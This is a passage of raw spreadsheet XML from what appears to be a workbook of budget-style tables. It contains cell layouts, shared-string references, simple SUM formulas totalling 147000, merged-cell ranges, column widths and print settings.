      <c r="C10" s="65"/>
      <c r="D10" s="65"/>
      <c r="E10" s="65"/>
      <c r="F10" s="65"/>
      <c r="G10" s="65"/>
    </row>
    <row r="11" spans="1:8" ht="27.95" customHeight="1">
      <c r="A11" s="89" t="s">
        <v>1129</v>
      </c>
      <c r="B11" s="63"/>
      <c r="C11" s="65"/>
      <c r="D11" s="65"/>
      <c r="E11" s="65"/>
      <c r="F11" s="65"/>
      <c r="G11" s="65"/>
    </row>
    <row r="12" spans="1:8" ht="27.95" customHeight="1">
      <c r="A12" s="89" t="s">
        <v>1130</v>
      </c>
      <c r="B12" s="63"/>
      <c r="C12" s="65"/>
      <c r="D12" s="65"/>
      <c r="E12" s="65"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
    </row>
    <row r="13" spans="1:8" ht="27.95" customHeight="1">
      <c r="A13" s="89" t="s">
        <v>1131</v>
      </c>
      <c r="B13" s="63"/>
      <c r="C13" s="65"/>
      <c r="D13" s="65"/>
      <c r="E13" s="65"/>
      <c r="F13" s="65"/>
      <c r="G13" s="65"/>
    </row>
    <row r="14" spans="1:8" ht="27.95" customHeight="1">
      <c r="A14" s="89" t="s">
        <v>1132</v>
      </c>
      <c r="B14" s="63"/>
      <c r="C14" s="65"/>
      <c r="D14" s="65"/>
      <c r="E14" s="65"/>
      <c r="F14" s="65"/>
      <c r="G14" s="65"/>
    </row>
    <row r="15" spans="1:8" ht="27.95" customHeight="1">
      <c r="A15" s="89" t="s">
        <v>1133</v>
      </c>
      <c r="B15" s="63"/>
      <c r="C15" s="65"/>
      <c r="D15" s="65"/>
      <c r="E15" s="65"/>
      <c r="F15" s="65"/>
      <c r="G15" s="65"/>
    </row>
    <row r="16" spans="1:8" ht="27.95" customHeight="1">
      <c r="A16" s="89" t="s">
        <v>1134</v>
      </c>
      <c r="B16" s="63"/>
      <c r="C16" s="65"/>
      <c r="D16" s="65"/>
      <c r="E16" s="65"/>
      <c r="F16" s="65"/>
      <c r="G16" s="65"/>
    </row>
    <row r="17" spans="1:7" ht="27.95" customHeight="1">
      <c r="A17" s="89" t="s">
        <v>1135</v>
      </c>
      <c r="B17" s="63"/>
      <c r="C17" s="65"/>
      <c r="D17" s="65"/>
      <c r="E17" s="65"/>
      <c r="F17" s="65"/>
      <c r="G17" s="65"/>
    </row>
    <row r="18" spans="1:7" ht="27.95" customHeight="1">
      <c r="A18" s="89" t="s">
        <v>1136</v>
      </c>
      <c r="B18" s="63"/>
      <c r="C18" s="65"/>
      <c r="D18" s="65"/>
      <c r="E18" s="65"/>
      <c r="F18" s="65"/>
      <c r="G18" s="65"/>
    </row>
    <row r="19" spans="1:7" ht="27.95" customHeight="1">
      <c r="A19" s="89" t="s">
        <v>1137</v>
      </c>
      <c r="B19" s="63"/>
      <c r="C19" s="65"/>
      <c r="D19" s="65"/>
      <c r="E19" s="65"/>
      <c r="F19" s="65"/>
      <c r="G19" s="65"/>
    </row>
    <row r="20" spans="1:7" ht="27.95" customHeight="1">
      <c r="A20" s="89" t="s">
        <v>1138</v>
      </c>
      <c r="B20" s="63"/>
      <c r="C20" s="65"/>
      <c r="D20" s="65"/>
      <c r="E20" s="65"/>
      <c r="F20" s="65"/>
      <c r="G20" s="65"/>
    </row>
    <row r="21" spans="1:7" ht="27.95" customHeight="1">
      <c r="A21" s="89" t="s">
        <v>1139</v>
      </c>
      <c r="B21" s="63">
        <v>147000</v>
      </c>
      <c r="C21" s="65"/>
      <c r="D21" s="65"/>
      <c r="E21" s="65"/>
      <c r="F21" s="65"/>
      <c r="G21" s="65"/>
    </row>
    <row r="22" spans="1:7">
      <c r="A22" s="44"/>
      <c r="B22" s="65"/>
      <c r="C22" s="65"/>
      <c r="D22" s="65"/>
      <c r="E22" s="65"/>
      <c r="F22" s="65"/>
      <c r="G22" s="65"/>
    </row>
    <row r="23" spans="1:7">
      <c r="A23" s="44"/>
      <c r="B23" s="65"/>
      <c r="C23" s="65"/>
      <c r="D23" s="65"/>
      <c r="E23" s="65"/>
      <c r="F23" s="65"/>
      <c r="G23" s="65"/>
    </row>
    <row r="24" spans="1:7">
      <c r="A24" s="44"/>
      <c r="B24" s="65"/>
      <c r="C24" s="65"/>
      <c r="D24" s="65"/>
      <c r="E24" s="65"/>
      <c r="F24" s="65"/>
      <c r="G24" s="65"/>
    </row>
    <row r="25" spans="1:7">
      <c r="B25" s="65"/>
      <c r="C25" s="65"/>
      <c r="D25" s="65"/>
      <c r="E25" s="65"/>
      <c r="F25" s="65"/>
      <c r="G25" s="65"/>
    </row>
    <row r="26" spans="1:7">
      <c r="B26" s="65"/>
      <c r="C26" s="65"/>
      <c r="D26" s="65"/>
      <c r="E26" s="65"/>
      <c r="F26" s="65"/>
      <c r="G26" s="65"/>
    </row>
    <row r="27" spans="1:7">
      <c r="B27" s="65"/>
      <c r="C27" s="65"/>
      <c r="D27" s="65"/>
      <c r="E27" s="65"/>
      <c r="F27" s="65"/>
      <c r="G27" s="65"/>
    </row>
    <row r="28" spans="1:7">
      <c r="B28" s="65"/>
      <c r="C28" s="65"/>
      <c r="D28" s="65"/>
      <c r="E28" s="65"/>
      <c r="F28" s="65"/>
      <c r="G28" s="65"/>
    </row>
    <row r="29" spans="1:7">
      <c r="B29" s="65"/>
      <c r="C29" s="65"/>
      <c r="D29" s="65"/>
      <c r="E29" s="65"/>
      <c r="F29" s="65"/>
      <c r="G29" s="65"/>
    </row>
    <row r="30" spans="1:7">
      <c r="B30" s="65"/>
      <c r="C30" s="65"/>
      <c r="D30" s="65"/>
      <c r="E30" s="65"/>
      <c r="F30" s="65"/>
      <c r="G30" s="65"/>
    </row>
    <row r="31" spans="1:7">
      <c r="B31" s="65"/>
      <c r="C31" s="65"/>
      <c r="D31" s="65"/>
      <c r="E31" s="65"/>
      <c r="F31" s="65"/>
      <c r="G31" s="65"/>
    </row>
    <row r="32" spans="1:7">
      <c r="B32" s="65"/>
      <c r="C32" s="65"/>
      <c r="D32" s="65"/>
      <c r="E32" s="65"/>
      <c r="F32" s="65"/>
      <c r="G32" s="65"/>
    </row>
    <row r="33" spans="2:7">
      <c r="B33" s="65"/>
      <c r="C33" s="65"/>
      <c r="D33" s="65"/>
      <c r="E33" s="65"/>
      <c r="F33" s="65"/>
      <c r="G33" s="65"/>
    </row>
    <row r="34" spans="2:7">
      <c r="B34" s="65"/>
      <c r="C34" s="65"/>
      <c r="D34" s="65"/>
      <c r="E34" s="65"/>
      <c r="F34" s="65"/>
      <c r="G34" s="65"/>
    </row>
    <row r="35" spans="2:7">
      <c r="B35" s="65"/>
      <c r="C35" s="65"/>
      <c r="D35" s="65"/>
      <c r="E35" s="65"/>
      <c r="F35" s="65"/>
      <c r="G35" s="65"/>
    </row>
    <row r="36" spans="2:7">
      <c r="B36" s="65"/>
      <c r="C36" s="65"/>
      <c r="D36" s="65"/>
      <c r="E36" s="65"/>
      <c r="F36" s="65"/>
      <c r="G36" s="65"/>
    </row>
    <row r="37" spans="2:7">
      <c r="B37" s="65"/>
      <c r="C37" s="65"/>
      <c r="D37" s="65"/>
      <c r="E37" s="65"/>
      <c r="F37" s="65"/>
      <c r="G37" s="65"/>
    </row>
    <row r="38" spans="2:7">
      <c r="B38" s="65"/>
      <c r="C38" s="65"/>
      <c r="D38" s="65"/>
      <c r="E38" s="65"/>
      <c r="F38" s="65"/>
      <c r="G38" s="65"/>
    </row>
    <row r="39" spans="2:7">
      <c r="B39" s="65"/>
      <c r="C39" s="65"/>
      <c r="D39" s="65"/>
      <c r="E39" s="65"/>
      <c r="F39" s="65"/>
      <c r="G39" s="65"/>
    </row>
    <row r="40" spans="2:7">
      <c r="B40" s="65"/>
      <c r="C40" s="65"/>
      <c r="D40" s="65"/>
      <c r="E40" s="65"/>
      <c r="F40" s="65"/>
      <c r="G40" s="65"/>
    </row>
    <row r="41" spans="2:7">
      <c r="B41" s="65"/>
      <c r="C41" s="65"/>
      <c r="D41" s="65"/>
      <c r="E41" s="65"/>
      <c r="F41" s="65"/>
      <c r="G41" s="65"/>
    </row>
    <row r="42" spans="2:7">
      <c r="B42" s="65"/>
      <c r="C42" s="65"/>
      <c r="D42" s="65"/>
      <c r="E42" s="65"/>
      <c r="F42" s="65"/>
      <c r="G42" s="65"/>
    </row>
    <row r="43" spans="2:7">
      <c r="B43" s="65"/>
      <c r="C43" s="65"/>
      <c r="D43" s="65"/>
      <c r="E43" s="65"/>
      <c r="F43" s="65"/>
      <c r="G43" s="65"/>
    </row>
    <row r="44" spans="2:7">
      <c r="B44" s="65"/>
      <c r="C44" s="65"/>
      <c r="D44" s="65"/>
      <c r="E44" s="65"/>
      <c r="F44" s="65"/>
      <c r="G44" s="65"/>
    </row>
    <row r="45" spans="2:7">
      <c r="B45" s="65"/>
      <c r="C45" s="65"/>
      <c r="D45" s="65"/>
      <c r="E45" s="65"/>
      <c r="F45" s="65"/>
      <c r="G45" s="65"/>
    </row>
  </sheetData>
  <mergeCells count="2">
    <mergeCell ref="A2:B2"/>
    <mergeCell ref="A3:B3"/>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workbookViewId="0">
      <selection activeCell="G10" sqref="G10"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="14.25"/>
  <cols>
    <col min="1" max="1" width="23.28515625" style="2" customWidth="1"/>
    <col min="2" max="8" width="9.7109375" style="2" customWidth="1"/>
    <col min="9" max="9" width="9.42578125" style="2" customWidth="1"/>
    <col min="10" max="10" width="10" style="2"/>
    <col min="11" max="11" width="11.42578125" style="2" customWidth="1"/>
    <col min="12" max="16384" width="10" style="2"/>
  </cols>
  <sheetData>
    <row r="1" spans="1:27" ht="18" customHeight="1">
      <c r="A1" s="38" t="s">
        <v>1143</v>
      </c>
      <c r="B1" s="59"/>
      <c r="C1" s="59"/>
      <c r="D1" s="59"/>
      <c r="E1" s="59"/>
      <c r="F1" s="59"/>
      <c r="G1" s="59"/>
    </row>
    <row r="2" spans="1:27" ht="38.1" customHeight="1">
      <c r="A2" s="748" t="s">
        <v>1144</v>
      </c>
      <c r="B2" s="748"/>
      <c r="C2" s="748"/>
      <c r="D2" s="748"/>
      <c r="E2" s="748"/>
      <c r="F2" s="748"/>
      <c r="G2" s="748"/>
      <c r="H2" s="748"/>
      <c r="I2" s="748"/>
    </row>
    <row r="3" spans="1:27" ht="24" customHeight="1">
      <c r="A3" s="754" t="s">
        <v>270</v>
      </c>
      <c r="B3" s="754"/>
      <c r="C3" s="754"/>
      <c r="D3" s="754"/>
      <c r="E3" s="754"/>
      <c r="F3" s="754"/>
      <c r="G3" s="754"/>
      <c r="H3" s="754"/>
      <c r="I3" s="754"/>
    </row>
    <row r="4" spans="1:27" ht="36" customHeight="1">
      <c r="A4" s="756" t="s">
        <v>1145</v>
      </c>
      <c r="B4" s="755" t="s">
        <v>1146</v>
      </c>
      <c r="C4" s="755"/>
      <c r="D4" s="755"/>
      <c r="E4" s="755"/>
      <c r="F4" s="755"/>
      <c r="G4" s="755"/>
      <c r="H4" s="755"/>
      <c r="I4" s="755" t="s">
        <v>1147</v>
      </c>
    </row>
    <row r="5" spans="1:27" ht="36" customHeight="1">
      <c r="A5" s="756"/>
      <c r="B5" s="755" t="s">
        <v>408</v>
      </c>
      <c r="C5" s="755" t="s">
        <v>1148</v>
      </c>
      <c r="D5" s="755" t="s">
        <v>1149</v>
      </c>
      <c r="E5" s="755" t="s">
        <v>1150</v>
      </c>
      <c r="F5" s="755"/>
      <c r="G5" s="755"/>
      <c r="H5" s="755" t="s">
        <v>1151</v>
      </c>
      <c r="I5" s="755"/>
    </row>
    <row r="6" spans="1:27" ht="36" customHeight="1">
      <c r="A6" s="756"/>
      <c r="B6" s="755"/>
      <c r="C6" s="755"/>
      <c r="D6" s="755"/>
      <c r="E6" s="60" t="s">
        <v>1152</v>
      </c>
      <c r="F6" s="60" t="s">
        <v>1153</v>
      </c>
      <c r="G6" s="60" t="s">
        <v>1154</v>
      </c>
      <c r="H6" s="755"/>
      <c r="I6" s="755"/>
    </row>
    <row r="7" spans="1:27" ht="36" customHeight="1">
      <c r="A7" s="75" t="s">
        <v>383</v>
      </c>
      <c r="B7" s="76">
        <f>SUM(B8:B8)</f>
        <v>147000</v>
      </c>
      <c r="C7" s="76">
        <f t="shared" ref="C7:I7" si="0">SUM(C8:C8)</f>
        <v>147000</v>
      </c>
      <c r="D7" s="76">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="E7" s="76">
        <f t="shared" si="0"/>
        <v>147000</v>
      </c>
      <c r="F7" s="76">
        <f t="shared" si="0"/>
        <v>147000</v>
      </c>
      <c r="G7" s="76">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="H7" s="76">
        <f t="shared" si="0"/>
        <v>0</v>
      </c>
      <c r="I7" s="76">
        <f t="shared" si="0"/>
        <v>147000</v>
      </c>
    </row>
    <row r="8" spans="1:27" ht="36" customHeight="1">
      <c r="A8" s="42" t="s">
        <v>1118</v>
      </c>
      <c r="B8" s="77">
        <f>C8+H8</f>
        <v>147000</v>
      </c>
      <c r="C8" s="77">
        <f>D8+E8</f>
        <v>147000</v>
      </c>
      <c r="D8" s="77"/>
      <c r="E8" s="77">
        <f>F8+G8</f>
        <v>147000</v>
      </c>
      <c r="F8" s="77">
        <v>147000</v>
      </c>
      <c r="G8" s="77"/>
      <c r="H8" s="78"/>
      <c r="I8" s="80">
        <v>147000</v>
      </c>
      <c r="K8" s="81"/>
      <c r="L8" s="82"/>
      <c r="M8" s="83"/>
      <c r="N8" s="83"/>
      <c r="O8" s="83"/>
      <c r="P8" s="83"/>
      <c r="Q8" s="83"/>
      <c r="R8" s="83"/>
      <c r="S8" s="83"/>
      <c r="U8" s="83"/>
      <c r="V8" s="83"/>
      <c r="W8" s="83"/>
      <c r="X8" s="83"/>
      <c r="Y8" s="83"/>
      <c r="Z8" s="83"/>
      <c r="AA8" s="83"/>
    </row>
    <row r="9" spans="1:27">
      <c r="A9" s="43"/>
      <c r="B9" s="79"/>
      <c r="C9" s="79"/>
      <c r="D9" s="79"/>
      <c r="E9" s="79"/>
      <c r="F9" s="79"/>
      <c r="G9" s="79"/>
    </row>
    <row r="10" spans="1:27">
      <c r="A10" s="43"/>
      <c r="B10" s="79"/>
      <c r="C10" s="79"/>
      <c r="D10" s="79"/>
      <c r="E10" s="79"/>
      <c r="F10" s="79"/>
      <c r="G10" s="79"/>
    </row>
    <row r="11" spans="1:27">
      <c r="A11" s="43"/>
      <c r="B11" s="79"/>
      <c r="C11" s="79"/>
      <c r="D11" s="79"/>
      <c r="E11" s="79"/>
      <c r="F11" s="79"/>
      <c r="G11" s="79"/>
    </row>
    <row r="12" spans="1:27">
      <c r="A12" s="44"/>
      <c r="B12" s="65"/>
      <c r="C12" s="65"/>
      <c r="D12" s="65"/>
      <c r="E12" s="65"/>
      <c r="F12" s="65"/>
      <c r="G12" s="65"/>
    </row>
    <row r="13" spans="1:27">
      <c r="A13" s="44"/>
      <c r="B13" s="65"/>
      <c r="C13" s="65"/>
      <c r="D13" s="65"/>
      <c r="E13" s="65"/>
      <c r="F13" s="65"/>
      <c r="G13" s="65"/>
    </row>
    <row r="14" spans="1:27">
      <c r="A14" s="44"/>
      <c r="B14" s="65"/>
      <c r="C14" s="65"/>
      <c r="D14" s="65"/>
      <c r="E14" s="65"/>
      <c r="F14" s="65"/>
      <c r="G14" s="65"/>
    </row>
    <row r="15" spans="1:27">
      <c r="A15" s="44"/>
      <c r="B15" s="65"/>
      <c r="C15" s="65"/>
      <c r="D15" s="65"/>
      <c r="E15" s="65"/>
      <c r="F15" s="65"/>
      <c r="G15" s="65"/>
    </row>
    <row r="16" spans="1:27">
      <c r="A16" s="44"/>
      <c r="B16" s="65"/>
      <c r="C16" s="65"/>
      <c r="D16" s="65"/>
      <c r="E16" s="65"/>
      <c r="F16" s="65"/>
      <c r="G16" s="65"/>
    </row>
    <row r="17" spans="1:7">
      <c r="A17" s="44"/>
      <c r="B17" s="65"/>
      <c r="C17" s="65"/>
      <c r="D17" s="65"/>
      <c r="E17" s="65"/>
      <c r="F17" s="65"/>
      <c r="G17" s="65"/>
    </row>
    <row r="18" spans="1:7">
      <c r="A18" s="44"/>
      <c r="B18" s="65"/>
      <c r="C18" s="65"/>
      <c r="D18" s="65"/>
      <c r="E18" s="65"/>
      <c r="F18" s="65"/>
      <c r="G18" s="65"/>
    </row>
    <row r="19" spans="1:7">
      <c r="A19" s="44"/>
      <c r="B19" s="65"/>
      <c r="C19" s="65"/>
      <c r="D19" s="65"/>
      <c r="E19" s="65"/>
      <c r="F19" s="65"/>
      <c r="G19" s="65"/>
    </row>
    <row r="20" spans="1:7">
      <c r="A20" s="44"/>
      <c r="B20" s="65"/>
      <c r="C20" s="65"/>
      <c r="D20" s="65"/>
      <c r="E20" s="65"/>
      <c r="F20" s="65"/>
      <c r="G20" s="65"/>
    </row>
    <row r="21" spans="1:7">
      <c r="A21" s="44"/>
      <c r="B21" s="65"/>
      <c r="C21" s="65"/>
      <c r="D21" s="65"/>
      <c r="E21" s="65"/>
      <c r="F21" s="65"/>
      <c r="G21" s="65"/>
    </row>
    <row r="22" spans="1:7">
      <c r="A22" s="44"/>
      <c r="B22" s="65"/>
      <c r="C22" s="65"/>
      <c r="D22" s="65"/>
      <c r="E22" s="65"/>
      <c r="F22" s="65"/>
      <c r="G22" s="65"/>
    </row>
    <row r="23" spans="1:7">
      <c r="A23" s="44"/>
      <c r="B23" s="65"/>
      <c r="C23" s="65"/>
      <c r="D23" s="65"/>
      <c r="E23" s="65"/>
      <c r="F23" s="65"/>
      <c r="G23" s="65"/>
    </row>
    <row r="24" spans="1:7">
      <c r="A24" s="44"/>
      <c r="B24" s="65"/>
      <c r="C24" s="65"/>
      <c r="D24" s="65"/>
      <c r="E24" s="65"/>
      <c r="F24" s="65"/>
      <c r="G24" s="65"/>
    </row>
    <row r="25" spans="1:7">
      <c r="A25" s="44"/>
      <c r="B25" s="65"/>
      <c r="C25" s="65"/>
      <c r="D25" s="65"/>
      <c r="E25" s="65"/>
      <c r="F25" s="65"/>
      <c r="G25" s="65"/>
    </row>
    <row r="26" spans="1:7">
      <c r="A26" s="44"/>
      <c r="B26" s="65"/>
      <c r="C26" s="65"/>
      <c r="D26" s="65"/>
      <c r="E26" s="65"/>
      <c r="F26" s="65"/>
      <c r="G26" s="65"/>
    </row>
    <row r="27" spans="1:7">
      <c r="A27" s="44"/>
      <c r="B27" s="65"/>
      <c r="C27" s="65"/>
      <c r="D27" s="65"/>
      <c r="E27" s="65"/>
      <c r="F27" s="65"/>
      <c r="G27" s="65"/>
    </row>
    <row r="28" spans="1:7">
      <c r="A28" s="44"/>
      <c r="B28" s="65"/>
      <c r="C28" s="65"/>
      <c r="D28" s="65"/>
      <c r="E28" s="65"/>
      <c r="F28" s="65"/>
      <c r="G28" s="65"/>
    </row>
    <row r="29" spans="1:7">
      <c r="A29" s="44"/>
      <c r="B29" s="65"/>
      <c r="C29" s="65"/>
      <c r="D29" s="65"/>
      <c r="E29" s="65"/>
      <c r="F29" s="65"/>
      <c r="G29" s="65"/>
    </row>
    <row r="30" spans="1:7">
      <c r="A30" s="44"/>
      <c r="B30" s="65"/>
      <c r="C30" s="65"/>
      <c r="D30" s="65"/>
      <c r="E30" s="65"/>
      <c r="F30" s="65"/>
      <c r="G30" s="65"/>
    </row>
    <row r="31" spans="1:7">
      <c r="B31" s="65"/>
      <c r="C31" s="65"/>
      <c r="D31" s="65"/>
      <c r="E31" s="65"/>
      <c r="F31" s="65"/>
      <c r="G31" s="65"/>
    </row>
    <row r="32" spans="1:7">
      <c r="B32" s="65"/>
      <c r="C32" s="65"/>
      <c r="D32" s="65"/>
      <c r="E32" s="65"/>
      <c r="F32" s="65"/>
      <c r="G32" s="65"/>
    </row>
    <row r="33" spans="2:7">
      <c r="B33" s="65"/>
      <c r="C33" s="65"/>
      <c r="D33" s="65"/>
      <c r="E33" s="65"/>
      <c r="F33" s="65"/>
      <c r="G33" s="65"/>
    </row>
    <row r="34" spans="2:7">
      <c r="B34" s="65"/>
      <c r="C34" s="65"/>
      <c r="D34" s="65"/>
      <c r="E34" s="65"/>
      <c r="F34" s="65"/>
      <c r="G34" s="65"/>
    </row>
    <row r="35" spans="2:7">
      <c r="B35" s="65"/>
      <c r="C35" s="65"/>
      <c r="D35" s="65"/>
      <c r="E35" s="65"/>
      <c r="F35" s="65"/>
      <c r="G35" s="65"/>
    </row>
    <row r="36" spans="2:7">
      <c r="B36" s="65"/>
      <c r="C36" s="65"/>
      <c r="D36" s="65"/>
      <c r="E36" s="65"/>
      <c r="F36" s="65"/>
      <c r="G36" s="65"/>
    </row>
    <row r="37" spans="2:7">
      <c r="B37" s="65"/>
      <c r="C37" s="65"/>
      <c r="D37" s="65"/>
      <c r="E37" s="65"/>
      <c r="F37" s="65"/>
      <c r="G37" s="65"/>
    </row>
    <row r="38" spans="2:7">
      <c r="B38" s="65"/>
      <c r="C38" s="65"/>
      <c r="D38" s="65"/>
      <c r="E38" s="65"/>
      <c r="F38" s="65"/>
      <c r="G38" s="65"/>
    </row>
    <row r="39" spans="2:7">
      <c r="B39" s="65"/>
      <c r="C39" s="65"/>
      <c r="D39" s="65"/>
      <c r="E39" s="65"/>
      <c r="F39" s="65"/>
      <c r="G39" s="65"/>
    </row>
    <row r="40" spans="2:7">
      <c r="B40" s="65"/>
      <c r="C40" s="65"/>
      <c r="D40" s="65"/>
      <c r="E40" s="65"/>
      <c r="F40" s="65"/>
      <c r="G40" s="65"/>
    </row>
    <row r="41" spans="2:7">
      <c r="B41" s="65"/>
      <c r="C41" s="65"/>
      <c r="D41" s="65"/>
      <c r="E41" s="65"/>
      <c r="F41" s="65"/>
      <c r="G41" s="65"/>
    </row>
    <row r="42" spans="2:7">
      <c r="B42" s="65"/>
      <c r="C42" s="65"/>
      <c r="D42" s="65"/>
      <c r="E42" s="65"/>
      <c r="F42" s="65"/>
      <c r="G42" s="65"/>
    </row>
    <row r="43" spans="2:7">
      <c r="B43" s="65"/>
      <c r="C43" s="65"/>
      <c r="D43" s="65"/>
      <c r="E43" s="65"/>
      <c r="F43" s="65"/>
      <c r="G43" s="65"/>
    </row>
    <row r="44" spans="2:7">
      <c r="B44" s="65"/>
      <c r="C44" s="65"/>
      <c r="D44" s="65"/>
      <c r="E44" s="65"/>
      <c r="F44" s="65"/>
      <c r="G44" s="65"/>
    </row>
    <row r="45" spans="2:7">
      <c r="B45" s="65"/>
      <c r="C45" s="65"/>
      <c r="D45" s="65"/>
      <c r="E45" s="65"/>
      <c r="F45" s="65"/>
      <c r="G45" s="65"/>
    </row>
    <row r="46" spans="2:7">
      <c r="B46" s="65"/>
      <c r="C46" s="65"/>
      <c r="D46" s="65"/>
      <c r="E46" s="65"/>
      <c r="F46" s="65"/>
      <c r="G46" s="65"/>
    </row>
    <row r="47" spans="2:7">
      <c r="B47" s="65"/>
      <c r="C47" s="65"/>
      <c r="D47" s="65"/>
      <c r="E47" s="65"/>
      <c r="F47" s="65"/>
      <c r="G47" s="65"/>
    </row>
    <row r="48" spans="2:7">
      <c r="B48" s="65"/>
      <c r="C48" s="65"/>
      <c r="D48" s="65"/>
      <c r="E48" s="65"/>
      <c r="F48" s="65"/>
      <c r="G48" s="65"/>
    </row>
    <row r="49" spans="2:7">
      <c r="B49" s="65"/>
      <c r="C49" s="65"/>
      <c r="D49" s="65"/>
      <c r="E49" s="65"/>
      <c r="F49" s="65"/>
      <c r="G49" s="65"/>
    </row>
    <row r="50" spans="2:7">
      <c r="B50" s="65"/>
      <c r="C50" s="65"/>
      <c r="D50" s="65"/>
      <c r="E50" s="65"/>
      <c r="F50" s="65"/>
      <c r="G50" s="65"/>
    </row>
    <row r="51" spans="2:7">
      <c r="B51" s="65"/>
      <c r="C51" s="65"/>
      <c r="D51" s="65"/>
      <c r="E51" s="65"/>
      <c r="F51" s="65"/>
      <c r="G51" s="65"/>
    </row>
  </sheetData>
  <mergeCells count="10">
    <mergeCell ref="A2:I2"/>
    <mergeCell ref="A3:I3"/>
    <mergeCell ref="B4:H4"/>
    <mergeCell ref="E5:G5"/>
    <mergeCell ref="A4:A6"/>
    <mergeCell ref="B5:B6"/>
    <mergeCell ref="C5:C6"/>
    <mergeCell ref="D5:D6"/>
    <mergeCell ref="H5:H6"/>
    <mergeCell ref="I4:I6"/>
  </mergeCells>
  <phoneticPr fontId="54" type="noConversion"/>
  <printOptions horizontalCentered="1"/>
  <pageMargins left="0.39305555555555599" right="0.39305555555555599" top="0.39305555555555599" bottom="0.39305555555555599" header="0.5" footer="0.5"/>
  <pageSetup paperSize="9" scale="95"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Y84"/>
  <sheetViews>
    <sheetView workbookViewId="0">
      <selection activeCell="G16" sqref="G16"/>
    </sheetView>
  </sheetViews>
  <sheetFormatPr defaultColWidth="10" defaultRowHeight="15"/>
  <cols>
    <col min="1" max="1" width="73.28515625" style="2" customWidth="1"/>
    <col min="2" max="2" width="21.5703125" style="2" customWidth="1"/>
    <col min="3" max="239" width="10" style="2"/>
    <col min="240" max="240" width="50.42578125" style="2" customWidth="1"/>
    <col min="241" max="241" width="43" style="2" customWidth="1"/>
    <col min="242" max="495" width="10" style="2"/>
    <col min="496" max="496" width="50.42578125" style="2" customWidth="1"/>
    <col min="497" max="497" width="43" style="2" customWidth="1"/>
    <col min="498" max="751" width="10" style="2"/>
    <col min="752" max="752" width="50.42578125" style="2" customWidth="1"/>
    <col min="753" max="753" width="43" style="2" customWidth="1"/>
    <col min="754" max="1007" width="10" style="2"/>
    <col min="1008" max="1008" width="50.42578125" style="2" customWidth="1"/>
    <col min="1009" max="1009" width="43" style="2" customWidth="1"/>
    <col min="1010" max="1263" width="10" style="2"/>
    <col min="1264" max="1264" width="50.42578125" style="2" customWidth="1"/>
    <col min="1265" max="1265" width="43" style="2" customWidth="1"/>
    <col min="1266" max="1519" width="10" style="2"/>
    <col min="1520" max="1520" width="50.42578125" style="2" customWidth="1"/>
    <col min="1521" max="1521" width="43" style="2" customWidth="1"/>
    <col min="1522" max="1775" width="10" style="2"/>
    <col min="1776" max="1776" width="50.42578125" style="2" customWidth="1"/>
    <col min="1777" max="1777" width="43" style="2" customWidth="1"/>
    <col min="1778" max="2031" width="10" style="2"/>
    <col min="2032" max="2032" width="50.42578125" style="2" customWidth="1"/>
    <col min="2033" max="2033" width="43" style="2" customWidth="1"/>
    <col min="2034" max="2287" width="10" style="2"/>
    <col min="2288" max="2288" width="50.42578125" style="2" customWidth="1"/>
    <col min="2289" max="2289" width="43" style="2" customWidth="1"/>
    <col min="2290" max="2543" width="10" style="2"/>
    <col min="2544" max="2544" width="50.42578125" style="2" customWidth="1"/>
    <col min="2545" max="2545" width="43" style="2" customWidth="1"/>
    <col min="2546" max="2799" width="10" style="2"/>
    <col min="2800" max="2800" width="50.42578125" style="2" customWidth="1"/>
    <col min="2801" max="2801" width="43" style="2" customWidth="1"/>
    <col min="2802" max="3055" width="10" style="2"/>
    <col min="3056" max="3056" width="50.42578125" style="2" customWidth="1"/>
    <col min="3057" max="3057" width="43" style="2" customWidth="1"/>
    <col min="3058" max="3311" width="10" style="2"/>
    <col min="3312" max="3312" width="50.42578125" style="2" customWidth="1"/>
    <col min="3313" max="3313" width="43" style="2" customWidth="1"/>
    <col min="3314" max="3567" width="10" style="2"/>
    <col min="3568" max="3568" width="50.42578125" style="2" customWidth="1"/>
    <col min="3569" max="3569" width="43" style="2" customWidth="1"/>
    <col min="3570" max="3823" width="10" style="2"/>
    <col min="3824" max="3824" width="50.42578125" style="2" customWidth="1"/>
    <col min="3825" max="3825" width="43" style="2" customWidth="1"/>
    <col min="3826" max="4079" width="10" style="2"/>
    <col min="4080" max="4080" width="50.42578125" style="2" customWidth="1"/>
    <col min="4081" max="4081" width="43" style="2" customWidth="1"/>
    <col min="4082" max="4335" width="10" style="2"/>
    <col min="4336" max="4336" width="50.42578125" style="2" customWidth="1"/>
    <col min="4337" max="4337" width="43" style="2" customWidth="1"/>
    <col min="4338" max="4591" width="10" style="2"/>
    <col min="4592" max="4592" width="50.42578125" style="2" customWidth="1"/>
    <col min="4593" max="4593" width="43" style="2" customWidth="1"/>
    <col min="4594" max="4847" width="10" style="2"/>
    <col min="4848" max="4848" width="50.42578125" style="2" customWidth="1"/>
    <col min="4849" max="4849" width="43" style="2" customWidth="1"/>
    <col min="4850" max="5103" width="10" style="2"/>
    <col min="5104" max="5104" width="50.42578125" style="2" customWidth="1"/>
    <col min="5105" max="5105" width="43" style="2" customWidth="1"/>
    <col min="5106" max="5359" width="10" style="2"/>
    <col min="5360" max="5360" width="50.42578125" style="2" customWidth="1"/>
    <col min="5361" max="5361" width="43" style="2" customWidth="1"/>
    <col min="5362" max="5615" width="10" style="2"/>
    <col min="5616" max="5616" width="50.42578125" style="2" customWidth="1"/>
    <col min="5617" max="5617" width="43" style="2" customWidth="1"/>
    <col min="5618" max="5871" width="10" style="2"/>
    <col min="5872" max="5872" width="50.42578125" style="2" customWidth="1"/>
    <col min="5873" max="5873" width="43" style="2" customWidth="1"/>
    <col min="5874" max="6127" width="10" style="2"/>
    <col min="6128" max="6128" width="50.42578125" style="2" customWidth="1"/>
    <col min="6129" max="6129" width="43" style="2" customWidth="1"/>
    <col min="6130" max="6383" width="10" style="2"/>
    <col min="6384" max="6384" width="50.42578125" style="2" customWidth="1"/>
    <col min="6385" max="6385" width="43" style="2" customWidth="1"/>
    <col min="6386" max="6639" width="10" style="2"/>
    <col min="6640" max="6640" width="50.42578125" style="2" customWidth="1"/>
    <col min="6641" max="6641" width="43" style="2" customWidth="1"/>
    <col min="6642" max="6895" width="10" style="2"/>
    <col min="6896" max="6896" width="50.42578125" style="2" customWidth="1"/>
